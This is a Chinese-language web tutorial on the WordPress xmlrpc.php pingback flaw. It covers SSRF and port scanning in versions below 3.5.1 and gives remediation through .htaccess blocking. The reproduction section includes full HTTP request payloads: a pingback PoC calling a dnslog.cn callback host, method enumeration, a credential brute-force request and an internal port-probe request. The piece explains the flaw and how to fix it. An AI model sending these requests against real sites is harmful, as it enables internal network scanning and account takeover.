今天这篇我们来学习和了解“WordPress漏洞有何影响，如何复现并解决”，下文的讲解详细，步骤过程清晰，对大家进一步学习和理解“WordPress漏洞有何影响，如何复现并解决”有一定的帮助。有这方面学习需要的朋友就继续往下看吧！

一、漏洞介绍

通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。

二、漏洞影响

WordPress 版本< 3.5.1

造成的影响
1、可以对业务内网进行探测。
2、攻击运行在内网或本地的应用程序（比如溢出攻击）。
3、利用file协议读取本地文件等

三、漏洞复现

第一步：直接访问这个文件，初步判断

第二步：发现POC验证数据包 

POST /xmlrpc.php HTTP/1.1
Host: www.目标.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 310
 
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://g8o53x.dnslog.cn/</string></value></param>
    <param><value><string>http://www.目标.com/?p=1</string></value></param>
    </params>
    </methodCall>

发送数据包

验证成功 ！

四、深入利用

（一）查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 （二）账号爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

（三）通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery，SSRF)和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>要探测的URL</string>
</value></param></params>
</methodCall>

五、漏洞修复

（一）通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下：

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

（二）删除根目录下的xmlrpc.php。

到此这篇关于“WordPress漏洞有何影响，如何复现并解决”的文章就介绍到这了,更多相关WordPress漏洞有何影响，如何复现并解决内容，欢迎关注群英网络技术资讯频道，小编将为大家输出更多高质量的实用文章！

免责声明：本站发布的内容（图片、视频和文字）以原创、转载和分享为主，文章观点不代表本网站立场，如果涉及侵权请联系站长邮箱：mmqy2019@163.com进行举报，并提供相关证据，查实之后，将立刻删除涉嫌侵权内容。

猜你喜欢

• PHP中删除功能的按钮如何实现，代码是什么

  这篇文章主要介绍了php ajax confirm 删除，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧

• PHP中echo和print输出语句有哪些共同点与区别？

  在PHP中，echo和print语句是常用的输出语句，但是很多PHP新手对于两者的区别不是很了解，对此，下面就主要给大家介绍一下PHP中echo和print输出语句的共同点以及区别。

• PHPMailer怎样实现发送邮件，方法是什么？

  直接用PHP就可以发送，无需搭建复杂的Email服务。介绍它提供的功能包括：*.在发送邮时指定多个收件人，抄送地址，暗送地址和回复地址*。

• swoole的onreceive没有触发是为什么，如何解释

  swoole的onReceive接收到数据时回调此函数，发生在worker进程中。如果swoole的onreceive没有触发可能是onReceive单次收到的数据超过了默认的64k。

• swoole升级怎样做，有什么编辑快速的方法

  我们可以通过php --ri命令查看swoole版本，编译升级，只需要从pecl官网下载最新的稳定版，这就相当于重新安装一次新版本就好了。pecl升级，使用pecl upgrade swoole命令。